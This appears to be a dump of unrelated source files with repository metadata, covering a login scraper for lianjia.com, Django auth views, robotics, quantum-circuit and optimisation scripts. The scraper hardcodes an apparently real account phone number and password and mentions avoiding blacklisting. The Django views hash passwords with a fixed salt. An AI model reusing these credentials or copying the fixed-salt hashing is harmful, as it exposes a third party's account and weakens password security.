'Accept': 'image/webp,image/*,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, sdch, br',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive',
'Content-Type': 'image/x-icon',
    # The Host header must be a bare host name, not a full URL
    'Host': 'passport.lianjia.com',
'Pragma': 'no-cache',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'
}
# Fetch lianjia_uuid (the initial visit sets the session cookies)
req = urllib2.Request('http://cd.lianjia.com/')
opener.open(req)
# Initialize the login form
req = urllib2.Request(auth_url, headers=headers)
result = opener.open(req)
# Extract the cookie and the "lt" token
pattern = re.compile(r'JSESSIONID=(.*)')
jsessionid = pattern.findall(result.info().getheader('Set-Cookie').split(';')[0])[0]
html_content = result.read()
gzipped = result.info().getheader('Content-Encoding')
if gzipped:
html_content = zlib.decompress(html_content, 16+zlib.MAX_WBITS)
pattern = re.compile(r'value=\"(LT-.*)\"')
lt = pattern.findall(html_content)[0]
pattern = re.compile(r'name="execution" value="(.*)"')
execution = pattern.findall(html_content)[0]
# data
data = {
    'username': '13678028750', # replace with your own account's username
    'password': 'lianjia333333$', # replace with your own account's password
'execution': execution,
'_eventId': 'submit',
'lt': lt,
'verifyCode': '',
'redirect': '',
}
print data
# URL-encode the form data with urllib
post_data=urllib.urlencode(data)
req = urllib2.Request(auth_url, post_data, headers)
try:
result = opener.open(req)
except urllib2.HTTPError, e:
print e.getcode()
print e.reason
print e.geturl()
print e.info()
# If blocked, do not log in again right away, to avoid being blacklisted;
# req = urllib2.Request(e.geturl())
# result = opener.open(req)
# req = urllib2.Request(chengjiao_url)
# result = opener.open(req).read()
#print result
| [
"[email protected]"
]
| |
aca7f484f5a03a70cba8f08aa9de457a46a307c0 | 6098c4c76b937fe44f941893c6aa6ad4d0412000 | /doug_proj/doug/credentials_template.py | 87f9a3614b60401c316266034e6efb4905579d58 | []
| no_license | kishan/doug | 8979d7fa6885fe143e42c9b7fed024c487ff94ad | 6482b60bc4dcbdf7ac6460db0f3da7c4342482c2 | refs/heads/master | 2021-01-22T05:06:45.557212 | 2017-02-12T23:03:18 | 2017-02-12T23:03:18 | 81,622,898 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py | # copy template below and save in file called credentials.py
CREDENTIALS = {
"access_token":"",
"VALIDATION_TOKEN":"",
"api_key":""
} | [
"[email protected]"
]
| |
74346e82fb06a0cd34614b8570a7c22230e3218e | 3712a929d1124f514ea7af1ac0d4a1de03bb6773 | /开班笔记/个人项目/果园/project/userinfo/views.py | 1eb53cd0c7dd00a94ef94e8a2ede204e24208a68 | []
| no_license | jiyabing/learning | abd82aa3fd37310b4a98b11ea802c5b0e37b7ad9 | 6059006b0f86aee9a74cfc116d2284eb44173f41 | refs/heads/master | 2020-04-02T20:47:33.025331 | 2018-10-26T05:46:10 | 2018-10-26T05:46:10 | 154,779,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,293 | py | import logging
from django.contrib import messages
from django.contrib.auth.hashers import make_password, check_password
from django.core.exceptions import ObjectDoesNotExist
from django.db import DatabaseError
from django.shortcuts import render, redirect
from userinfo.models import UserInfo
# Create your views here.
auth_check = 'abc'
def login(request):
return render(request, 'login.html')
def login_in(request):
if request.method == 'POST':
user = UserInfo()
user.name = request.POST.get('user')
user.password = request.POST.get('pwd')
try:
find_user = UserInfo.objects.filter(name=user.name)
if len(find_user) <= 0:
                messages.add_message(request, messages.ERROR, 'This user is not registered')
return redirect('/user/login')
if not check_password(user.password, find_user[0].password):
return render(request, 'login.html',
                              {'user_info': user, 'message_error': 'Incorrect password'})
except ObjectDoesNotExist as e:
logging.warning(e)
return redirect('/')
    return redirect('/user/login')
def register(request):
return render(request, 'register.html')
def register_in(request):
if request.method == 'POST':
new_user = UserInfo()
new_user.name = request.POST.get('user')
if not new_user.name:
            return render(request, 'register.html', {'message0': 'Please enter a username'})
try:
a = UserInfo.objects.get(name=new_user.name)
if a:
                return render(request, 'register.html', {'message1': 'This user is already registered'})
except ObjectDoesNotExist as e:
logging.warning(e)
if request.POST.get('pwd') != request.POST.get('cpwd'):
            return render(request, 'register.html', {'message2': 'The two passwords do not match'})
new_user.password = make_password(request.POST.get('pwd'), auth_check, 'pbkdf2_sha1')
new_user.phone = request.POST.get('phone')
new_user.email = request.POST.get('email')
try:
new_user.save()
except DatabaseError as e:
logging.warning(e)
return render(request, 'index.html')
return render(request, 'register.html') | [
"[email protected]"
]
| |
f9f4751d2e9c05ff20569e2fff730457d677e304 | 57fc5d54f5df359c7a53020fb903f36479d3a322 | /controllers/.history/robot/robot_20201214160008.py | 046d51ee297654183bab7c9b7fcbfad4b3fd37f5 | []
| no_license | shenwuyue-xie/webots_testrobots | 929369b127258d85e66c5275c9366ce1a0eb17c7 | 56e476356f3cf666edad6449e2da874bb4fb4da3 | refs/heads/master | 2023-02-02T11:17:36.017289 | 2020-12-20T08:22:59 | 2020-12-20T08:22:59 | 323,032,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,172 | py |
from controller import Robot
from controller import Connector
from controller import Motor
from controller import DistanceSensor
from controller import Device
from controller import PositionSensor
import numpy as np
from deepbots.robots.controllers.robot_emitter_receiver_csv import \
RobotEmitterReceiverCSV
import math
class TaskDecisionRobot(RobotEmitterReceiverCSV):
def __init__(self):
super(TaskDecisionRobot,self).__init__()
self.name = self.robot.getName()
self.timestep = int(self.robot.getBasicTimeStep())
self.setupsensors()
self.setupmotors()
self.robot.batterySensorEnable(self.timestep)
def normalize_to_range(self,value, min, max, newMin, newMax):
value = float(value)
min = float(min)
max = float(max)
newMin = float(newMin)
newMax = float(newMax)
return (newMax - newMin) / (max - min) * (value - max) + newMax
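    # e.g. normalize_to_range(0.5, 0, 1, 6, 12) linearly rescales 0.5 from
    # [0, 1] onto [6, 12] and returns 9.0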
def setupsensors(self):
self.distancesensors = []
if self.name == "0":
self.n_distancesensors = 7
self.rearconnector = self.robot.getConnector("rear_connector")
self.dsNames = ['ds' + str(i) for i in range(self.n_distancesensors)]
for i in range(self.n_distancesensors):
self.distancesensors.append(self.robot.getDistanceSensor(self.dsNames[i]))
self.distancesensors[i].enable(self.timestep)
else :
self.n_distancesensors = 4
self.frontconnector = self.robot.getConnector("front_connector")
self.rearconnector = self.robot.getConnector("rear_connector")
self.dsNames = ['ds' + str(i) for i in range(self.n_distancesensors)]
for i in range(self.n_distancesensors):
self.distancesensors.append(self.robot.getDistanceSensor(self.dsNames[i]))
self.distancesensors[i].enable(self.timestep)
def setupmotors(self):
self.leftmotor= self.robot.getMotor('left_motor')
self.rightmotor= self.robot.getMotor('right_motor')
self.frontmotor = self.robot.getMotor('front_motor')
self.rearmotor = self.robot.getMotor('rear_motor')
self.leftmotor.setPosition(float('inf'))
self.rightmotor.setPosition(float('inf'))
self.leftmotor.setVelocity(0)
self.rightmotor.setVelocity(0)
self.rearpositionsensor = self.rearmotor.getPositionSensor()
self.rearpositionsensor.enable(self.timestep)
def create_message(self):
message = []
for distancesensor in self.distancesensors:
message.append(distancesensor.getValue())
return message
def use_message_data(self,message):
for i in range(2):
if float(message[i]) <0:
message[i] = self.normalize_to_range(float(message[i]),-0.1,0,-8,-4)
if float(message[i]) >= 0:
message[i] = self.normalize_to_range(float(message[i]),0,1.1,6,12)
for j in range(2,14):
# message[i] = float(message[i])
# x = np.random.uniform(0,1,12)
message[j] = self.normalize_to_range(float(message[j]),-0.1,1.1,0,1)
            # NOTE: the original indexed with the stale loop variable ``i``
            # below; ``j`` (this loop's variable) is clearly what was meant
            if message[j] >= 0 and message[j] <= 0.3:
                message[j] = 0
            elif message[j] > 0.4 and message[j] <= 0.7:
                message[j] = 0
            elif message[j] > 0.8 and message[j] <= 1:
                message[j] = 0
            elif message[j] > 0.7 and message[j] <= 0.8:
                message[j] = self.normalize_to_range(message[j], 0.7, 0.8, 0, math.pi/2)
            elif message[j] > 0.3 and message[j] <= 0.4:
                # assumed fix: the source interval should match this branch's
                # guard (0.3, 0.4]; the original passed (0, 0.1)
                message[j] = self.normalize_to_range(message[j], 0.3, 0.4, -math.pi/2, 0)
self.leftmotor.setVelocity(message[0])
self.rightmotor.setVelocity(message[1])
self.frontmotor.setPosition(message[int(self.name) * 2 + 2])
self.rearmotor.setPosition(message[int(self.name) * 2 + 3])
controller = TaskDecisionRobot()
controller.run()
| [
"[email protected]"
]
| |
25ebc6477404f30e4e15e869ae2e7bd4a932b605 | 7950c4faf15ec1dc217391d839ddc21efd174ede | /problems/0092.0_Reverse_Linked_List_II.py | f76687c1bb1a3916b824b332406fc4c4f57eb438 | []
| no_license | lixiang2017/leetcode | f462ecd269c7157aa4f5854f8c1da97ca5375e39 | f93380721b8383817fe2b0d728deca1321c9ef45 | refs/heads/master | 2023-08-25T02:56:58.918792 | 2023-08-22T16:43:36 | 2023-08-22T16:43:36 | 153,090,613 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,197 | py | '''
I do it only in one pass.
T: O(N)
S: O(1)
Runtime: 64 ms, faster than 13.84% of Python3 online submissions for Reverse Linked List II.
Memory Usage: 13.9 MB, less than 87.01% of Python3 online submissions for Reverse Linked List II.
'''
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:
if left == right:
return head
hair = ListNode(next=head)
node = hair
for _ in range(left - 1):
node = node.next
# node.next -> start
start = tail = node.next
another = None
for _ in range(right - left + 1):
nxt = start.next
start.next = another
another = start
start = nxt
# link tail to trailing nodes
tail.next = start
# link heading-nodes to another
node.next = another
return hair.next
'''
no need to check left == right
Runtime: 65 ms, faster than 12.39% of Python3 online submissions for Reverse Linked List II.
Memory Usage: 14.2 MB, less than 18.38% of Python3 online submissions for Reverse Linked List II.
'''
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:
hair = ListNode(next=head)
node = hair
for _ in range(left - 1):
node = node.next
# node.next -> start
start = tail = node.next
another = None
for _ in range(right - left + 1):
nxt = start.next
start.next = another
another = start
start = nxt
# link tail to trailing nodes
tail.next = start
# link heading-nodes to another
node.next = another
return hair.next
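# Minimal walk-through (illustrative only -- the LeetCode judge supplies
# ListNode and Optional, so this file is not standalone-runnable as-is):
#   input:  1 -> 2 -> 3 -> 4 -> 5, left=2, right=4
#   output: 1 -> 4 -> 3 -> 2 -> 5
# The dummy "hair" node guards the left == 1 case, so no special-casing
# of the head is needed.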
| [
"[email protected]"
]
| |
07576f9b3eec4640fe26ba3cef131645dcdf2a17 | 4b52336c8e5251c759a28d60635cbf8a66615c07 | /scripts/metrical_error.py | 70b487d57b58382d9077b6cd3c9f92c796e0d464 | []
| no_license | sanskrit-kosha/kosha | f51d8681be0dc8a6a9c9656cec446dc03875a1a0 | 39b90ae9265ab1d7408f889a12092788432eb2fb | refs/heads/master | 2023-04-30T02:46:59.005799 | 2023-04-10T05:00:29 | 2023-04-10T05:00:29 | 189,419,853 | 24 | 13 | null | 2020-12-19T08:24:12 | 2019-05-30T13:35:09 | HTML | UTF-8 | Python | false | false | 1,781 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tries to identify verses with imperfect meters from given file.
Prerequisites:
Put metrical_error.py file in shreevatsa/sanskrit folder.
Put the input_file to be checked for metrical inconsistencies
Usage from commandline:
python metrical_error.py input_file
python metrical_error.py input_file > log.txt
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import sys
import codecs
import identifier_pipeline
if __name__ == '__main__':
# Set logging level.
logging.getLogger().setLevel(logging.WARNING)
# create identifier class.
identifier = identifier_pipeline.IdentifierPipeline()
# input file.
filein = sys.argv[1]
# Read input file.
fin = codecs.open(filein, 'r', 'utf-8')
# Initialize empty verse.
verse = ''
# For each line,
for line in fin:
# Ignore lines starting with semicolon. Process others.
if not line.startswith(';'):
# Add to verse.
verse += line
# Double danda denotes end of verse. Start identifying meter.
if '॥' in line:
# print(verse)
# Identify meter.
identifier.IdentifyFromText(verse)
# Extract debug information.
debug_info = identifier.AllDebugOutput()
# for perfect match, raise no error.
if 'exact match' in debug_info:
pass
# Else print the verse and associated debug information.
else:
print(verse.encode('utf-8'))
print(debug_info.encode('utf-8'))
# Reset verse to blank
verse = ''
| [
"[email protected]"
]
| |
2f51c5475b8174f1d1cfa288a854afb39d686511 | f9ff85c981942d15c65d37de107e0c5fa5e6a2ba | /pychron/spectrometer/mftable.py | 085dbbfca92bed2e7d4d14971e5b55e235bea6a1 | [
"Apache-2.0"
]
| permissive | kenlchen/pychron | 0c729f1b1973b9883734007b7a318fe21669e6c1 | ffd988e27ae09fb3e8a8790d87ff611557911d07 | refs/heads/master | 2021-01-24T21:53:42.293554 | 2016-04-04T07:18:39 | 2016-04-04T07:18:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,980 | py | # ===============================================================================
# Copyright 2014 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from traits.api import HasTraits, List, Str, Dict, Float, Bool, Property, cached_property
from traitsui.api import View, Controller, TableEditor, UItem
# from traitsui.table_column import ObjectColumn
# ============= standard library imports ========================
import shutil
import csv
import os
import hashlib
from numpy import asarray, array, nonzero
from scipy.optimize import leastsq
# ============= local library imports ==========================
from pychron.core.helpers.filetools import add_extension
from pychron.loggable import Loggable
from pychron.paths import paths
from pychron.spectrometer import set_mftable_name, get_mftable_name
def get_detector_name(det):
if not isinstance(det, (str, unicode)):
det = det.name
return det
def mass_cal_func(p, x):
return p[0]*x**2+p[1]*x+p[2]
def least_squares(func, xs, ys, initial_guess):
xs, ys = asarray(xs), asarray(ys)
errfunc = lambda p, x, v: func(p, x) - v
ret, info = leastsq(errfunc, initial_guess, args=(xs, ys))
return ret
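# Illustrative check (hypothetical values, not from the original source):
# generating noiseless samples from a known quadratic and fitting them
# should recover the coefficients:
#
#     xs = [36.0, 39.0, 40.0]
#     ys = [mass_cal_func((0.01, 0.1, 1.0), x) for x in xs]
#     least_squares(mass_cal_func, xs, ys, [ys[0], xs[0], 0])
#     # -> approximately [0.01, 0.1, 1.0]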
class FieldItem(HasTraits):
isotope = Str
def to_csv(self, keys, fmt):
return [self.isotope] + [fmt(getattr(self, k)) for k in keys]
class MagnetFieldTable(Loggable):
"""
map a voltage to a mass
"""
items = List
molweights = Dict
_mftable = None
_detectors = None
db = None
spectrometer_name = Str
use_local_archive = Bool
use_db_archive = Bool
path = Property
def __init__(self, *args, **kw):
super(MagnetFieldTable, self).__init__(*args, **kw)
# p = paths.mftable
# if not os.path.isfile(p):
# self.warning_dialog('No Magnet Field Table. Create {}'.format(p))
# else:
# self.load_mftable()
# if os.environ.get('RTD', 'False') == 'False':
self.bind_preferences()
def initialize(self, molweights):
self.molweights = molweights
# p = paths.mftable
p = self.path
if not os.path.isfile(p):
self.warning_dialog('No Magnet Field Table. Create {}'.format(p))
else:
self.load_mftable(load_items=True)
def bind_preferences(self):
from apptools.preferences.preference_binding import bind_preference
prefid = 'pychron.spectrometer'
bind_preference(self, 'use_local_archive',
'{}.use_local_mftable_archive'.format(prefid))
bind_preference(self, 'use_db_archive',
'{}.use_db_mftable_archive'.format(prefid))
def get_dac(self, det, isotope):
det = get_detector_name(det)
d = self._get_mftable()
isos, xs, ys = map(array, d[det][:3])
refindex = min(nonzero(isos == isotope)[0])
return ys[refindex]
def update_field_table(self, det, isotope, dac, message):
"""
dac needs to be in axial units
"""
det = get_detector_name(det)
self.info('update mftable {} {} {} message={}'.format(det, isotope, dac, message))
d = self._get_mftable()
isos, xs, ys = map(array, d[det][:3])
try:
refindex = min(nonzero(isos == isotope)[0])
delta = dac - ys[refindex]
# need to calculate all ys
# using simple linear offset
# ys += delta
for k, (iso, xx, yy, _) in d.iteritems():
ny = yy + delta
p = least_squares(mass_cal_func, xx, ny, [ny[0], xx[0], 0])
d[k] = iso, xx, ny, p
self.dump(isos, d, message)
# self._mftable = isos, xs, ys
except ValueError:
import traceback
e = traceback.format_exc()
self.debug('Magnet update field table {}'.format(e))
def set_path_name(self, name):
        # ``_name_to_path`` no longer exists (see the commented-out block
        # below); compare the current file name against ``name`` directly
        if os.path.basename(self.path) != add_extension(name, '.csv'):
self.path = name
self.info('Using MFTable {}'.format(self.path))
self.load_mftable()
def get_table(self):
mt = self._get_mftable()
return mt
def load(self):
pass
def save(self):
detectors = self._detectors
p = self.path
p = '{}.temp'.format(p)
fmt = lambda x: '{:0.5f}'.format(x)
with open(p, 'w') as f:
writer = csv.writer(f)
writer.writerow(['iso'] + detectors)
for fi in self.items:
writer.writerow(fi.to_csv(detectors, fmt))
self._set_mftable_hash(p)
self._add_to_archive(p, message='manual modification')
def dump(self, isos, d, message):
detectors = self._detectors
p = self.path
with open(p, 'w') as f:
writer = csv.writer(f)
writer.writerow(['iso'] + detectors)
for i, iso in enumerate(isos):
a = [iso]
for hi in detectors:
iso, xs, ys, _ = d[hi]
a.append('{:0.5f}'.format(ys[i]))
writer.writerow(a)
self._set_mftable_hash(p)
self._add_to_archive(p, message)
# @property
# def mftable_path(self):
# return os.path.join(paths.spectrometer_dir, 'mftable.csv')
@property
def mftable_archive_path(self):
return os.path.join(paths.spectrometer_dir,
'{}_mftable_archive'.format(self.spectrometer_name))
def load_mftable(self, load_items=False):
"""
mftable format- first line is a header followed by
Isotope, Dac_i, Dac_j,....
Dac_i is the magnet dac setting to center Isotope on detector i
example::
iso, H2, H1, AX, L1, L2, CDD
Ar40,5.78790,5.895593,6.00675,6.12358,6.24510,6.35683
Ar39,5.89692,5.788276,5.89692,5.89692,5.89692,5.89692
Ar36,5.56072,5.456202,5.56072,5.56072,5.56072,5.56072
"""
p = self.path
self.debug('Using mftable located at {}'.format(p))
mws = self.molweights
self._set_mftable_hash(p)
items = []
with open(p, 'U') as f:
reader = csv.reader(f)
table = []
detectors = map(str.strip, reader.next()[1:])
for line in reader:
iso = line[0]
try:
mw = mws[iso]
                except KeyError:
                    self.warning('"{}" not in molweights'.format(iso))
continue
dacs = map(float, line[1:])
if load_items:
fi = FieldItem(isotope=iso)
for di, v in zip(detectors, dacs):
fi.add_trait(di, Float(v))
items.append(fi)
row = [iso, mw] + dacs
table.append(row)
self._report_mftable(detectors, items)
self.items = items
table = zip(*table)
isos, mws = list(table[0]), list(table[1])
d = {}
for i, k in enumerate(detectors):
ys = table[2 + i]
try:
c = least_squares(mass_cal_func, mws, ys, [ys[0], mws[0], 0])
except TypeError:
c = (0, 1, ys[0])
d[k] = (isos, mws, ys, c)
self._mftable = d
# self._mftable={k: (isos, mws, table[2 + i], )
# for i, k in enumerate(detectors)}
self._detectors = detectors
def _report_mftable(self, detectors, items):
self.debug('============ MFtable ===========')
self.debug('{:<8s} {}'.format('Isotope', ''.join(['{:<7s}'.format(di) for di in detectors])))
for it in items:
vs = ['{:0.4f}'.format(getattr(it, di)) for di in detectors]
self.debug('{:<8s} {}'.format(it.isotope, ' '.join(vs)))
self.debug('================================')
def _get_mftable(self):
if not self._mftable or not self._check_mftable_hash():
self.load_mftable()
return self._mftable
def _check_mftable_hash(self):
"""
return True if mftable externally modified
"""
# p = paths.mftable
current_hash = self._make_hash(self.path)
return self._mftable_hash != current_hash
def _make_hash(self, p):
with open(p, 'U') as rfile:
return hashlib.md5(rfile.read())
def _set_mftable_hash(self, p):
self._mftable_hash = self._make_hash(p)
def _add_to_archive(self, p, message):
if self.use_db_archive:
if self.db:
self.info('db archiving mftable')
with open(p, 'r') as rfile:
self.db.add_mftable(self.spectrometer_name, rfile.read())
else:
self.debug('no db instance available for archiving')
if self.use_local_archive:
try:
from pychron.git_archive.git_archive import GitArchive
except ImportError:
self.warning('GitPython >=0.3.2RC1 required for local MFTable Archiving')
return
archive = GitArchive(self.mftable_archive_path)
# copy
dest = os.path.join(self.mftable_archive_path, os.path.basename(p))
shutil.copyfile(p, dest)
archive.add(dest, msg=message)
archive.close()
self.info('locally archiving mftable')
def _set_path(self, name):
set_mftable_name(name)
@cached_property
def _get_path(self):
name = get_mftable_name()
return os.path.join(paths.mftable_dir, add_extension(name, '.csv'))
# def _name_to_path(self, name):
# if name:
# name = os.path.join(paths.mftable_dir, add_extension(name, '.csv'))
# return name or ''
#
# def _set_path(self, v):
# self._path = self._name_to_path(v)
#
# def _get_path(self):
# if self._path:
# p = self._path
# else:
# p = paths.mftable
# return p
# ============= EOF =============================================
| [
"[email protected]"
]
| |
c18b3cb7ee53ef6f4e57c84b67f7d88e779e289e | 65f14cce454ac723c74f70b5d39cdc1a58b6a91b | /test.py | c46fdab8e3a52e9e967ba3e0471969553358af18 | []
| no_license | wagolemusa/FlaskAPis | d9d2b81d4a8520d0f79bf476e6e9d0f8a655d6bf | d916b04a962e72a9142a75d7fc53840fbcfec422 | refs/heads/master | 2020-03-23T15:02:00.408224 | 2018-10-15T15:14:57 | 2018-10-15T15:14:57 | 141,716,049 | 0 | 0 | null | 2018-10-10T16:53:05 | 2018-07-20T13:33:59 | Python | UTF-8 | Python | false | false | 1,829 | py | from app import app
import unittest
class FlaskTestCase(unittest.TestCase):
    # Ensure that Flask was set up correctly
def test_index(self):
tester = app.test_client(self)
response = tester.get('/login', content_type='html/text')
self.assertEqual(response.status_code, 200)
# Ensure that login page loads correctly
def test_login_page_loads(self):
tester = app.test_client(self)
response = tester.get('/login', content_type='html/text')
self.assertFalse(b'Please try again.' in response.data)
    # Ensure that login behaves correctly
def test_correct_login(self):
tester = app.test_client(self)
response = tester.post(
'/login',
data=dict(username="admin", password="admin"),
follow_redirects=True
)
self.assertIn(b'You are just login', response.data)
    # Test wrong credentials
def test_incorrect_login(self):
tester = app.test_client(self)
response = tester.post(
'/login',
data=dict(username="wrong", password="wrong"),
follow_redirects=True
)
self.assertIn(b'Invalid credentials. Please try again', response.data)
    # Test logout
    def test_logout(self):
        tester = app.test_client(self)
        tester.post(
            '/login',
            data=dict(username="admin", password="admin"),
            follow_redirects=True
        )
        # log in first, then hit the logout route ('/logout' is assumed here)
        response = tester.get('/logout', follow_redirects=True)
        self.assertIn(b'You were just Logged out', response.data)
    # Ensure that main page requires login
def test_main_route_requires_login(self):
tester = app.test_client(self)
response = tester.get('/', follow_redirects=True)
        # assertTrue(a, b) treats b as the failure message, so the original
        # check was vacuous; assertIn performs the intended membership test
        self.assertIn(b'You need to first Login', response.data)
def test_post_show_up(self):
tester = app.test_client(self)
response = tester.post(
'/login',
data=dict(username="admin", password="admin"),
follow_redirects=True
)
self.assertIn(b'Im well', response.data)
if __name__ =='__main__':
unittest.main() | [
"[email protected]"
]
| |
bf161dacfe80fdf84648076044416621060b7549 | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/tags/2008/programming/libs/openexr/actions.py | bbb492342c23594450270c0a93e02d0fe4894b4b | []
| no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2005-2008 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def setup():
autotools.configure("--enable-shared \
--enable-imfexamples \
--enable-imffuzztest \
--disable-static")
def build():
autotools.make()
def install():
# documents and examples go to "/usr/share/OpenEXR" without these parameters
docdir = "/usr/share/doc/%s" % get.srcTAG()
examplesdir = "%s/examples" % docdir
autotools.rawInstall("DESTDIR=%s docdir=%s examplesdir=%s" % (get.installDIR(), docdir, examplesdir))
pisitools.dodoc("AUTHORS", "ChangeLog","NEWS", "README","LICENSE")
| [
"[email protected]"
]
| |
7625a749cac98b120e763c7d4acf51ac35d00eba | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startPyquil2055.py | 8182827470465e78a48300f2e0b4bb6f4b4b58b2 | [
"BSD-3-Clause"
]
| permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,668 | py | # qubit number=4
# total number=30
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += X(3) # number=1
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += Y(3) # number=12
prog += H(0) # number=5
prog += H(1) # number=6
prog += H(2) # number=7
prog += H(3) # number=8
prog += H(0) # number=9
prog += Y(2) # number=10
prog += Y(2) # number=11
prog += CNOT(1,0) # number=13
prog += H(0) # number=15
prog += CZ(1,0) # number=16
prog += H(1) # number=20
prog += H(2) # number=19
prog += H(0) # number=27
prog += CZ(3,0) # number=28
prog += H(0) # number=29
prog += Z(3) # number=25
prog += CNOT(3,0) # number=26
prog += H(0) # number=17
prog += CNOT(2,0) # number=21
prog += X(1) # number=23
prog += CNOT(2,0) # number=22
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil2055.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
"[email protected]"
]
| |
a630382faf9954faa047953a9d9cd71b7f3b32ca | 75cf6a9fd035883b64ca2309382e0178cf370b43 | /Empirical/python/Artificial-Intelligence-with-Python/Chapter 08/visualization1.py | 87c3154afcfd82ddb65576615f5100e38768a547 | [
"MIT"
]
| permissive | ygtfrdes/Program | 171b95b9f32a105185a7bf8ec6c8c1ca9d1eda9d | 1c1e30230f0df50733b160ca73510c41d777edb9 | refs/heads/master | 2022-10-08T13:13:17.861152 | 2019-11-06T04:53:27 | 2019-11-06T04:53:27 | 219,560,170 | 1 | 2 | null | 2022-09-30T19:51:17 | 2019-11-04T17:39:52 | HTML | UTF-8 | Python | false | false | 3,652 | py | #!/usr/bin/python
import numpy as np
import matplotlib.pyplot as plt
from deap import algorithms, base, benchmarks, \
cma, creator, tools
# Function to create a toolbox
def create_toolbox(strategy):
creator.create("FitnessMin", base.Fitness, weights=(-1.0,))
creator.create("Individual", list, fitness=creator.FitnessMin)
toolbox = base.Toolbox()
toolbox.register("evaluate", benchmarks.rastrigin)
    # Seed the random number generator
np.random.seed(7)
toolbox.register("generate", strategy.generate, creator.Individual)
toolbox.register("update", strategy.update)
return toolbox
if __name__ == "__main__":
# Problem size
num_individuals = 10
num_generations = 125
# Create a strategy using CMA-ES algorithm
strategy = cma.Strategy(centroid=[5.0]*num_individuals, sigma=5.0,
lambda_=20*num_individuals)
# Create toolbox based on the above strategy
toolbox = create_toolbox(strategy)
# Create hall of fame object
hall_of_fame = tools.HallOfFame(1)
# Register the relevant stats
stats = tools.Statistics(lambda x: x.fitness.values)
stats.register("avg", np.mean)
stats.register("std", np.std)
stats.register("min", np.min)
stats.register("max", np.max)
logbook = tools.Logbook()
logbook.header = "gen", "evals", "std", "min", "avg", "max"
# Objects that will compile the data
sigma = np.ndarray((num_generations, 1))
axis_ratio = np.ndarray((num_generations, 1))
diagD = np.ndarray((num_generations, num_individuals))
fbest = np.ndarray((num_generations,1))
best = np.ndarray((num_generations, num_individuals))
std = np.ndarray((num_generations, num_individuals))
for gen in range(num_generations):
# Generate a new population
population = toolbox.generate()
# Evaluate the individuals
fitnesses = toolbox.map(toolbox.evaluate, population)
for ind, fit in zip(population, fitnesses):
ind.fitness.values = fit
# Update the strategy with the evaluated individuals
toolbox.update(population)
# Update the hall of fame and the statistics with the
# currently evaluated population
hall_of_fame.update(population)
record = stats.compile(population)
logbook.record(evals=len(population), gen=gen, **record)
print(logbook.stream)
# Save more data along the evolution
sigma[gen] = strategy.sigma
axis_ratio[gen] = max(strategy.diagD)**2/min(strategy.diagD)**2
diagD[gen, :num_individuals] = strategy.diagD**2
fbest[gen] = hall_of_fame[0].fitness.values
best[gen, :num_individuals] = hall_of_fame[0]
std[gen, :num_individuals] = np.std(population, axis=0)
# The x-axis will be the number of evaluations
x = list(range(0, strategy.lambda_ * num_generations, strategy.lambda_))
avg, max_, min_ = logbook.select("avg", "max", "min")
plt.figure()
plt.semilogy(x, avg, "--b")
plt.semilogy(x, max_, "--b")
plt.semilogy(x, min_, "-b")
plt.semilogy(x, fbest, "-c")
plt.semilogy(x, sigma, "-g")
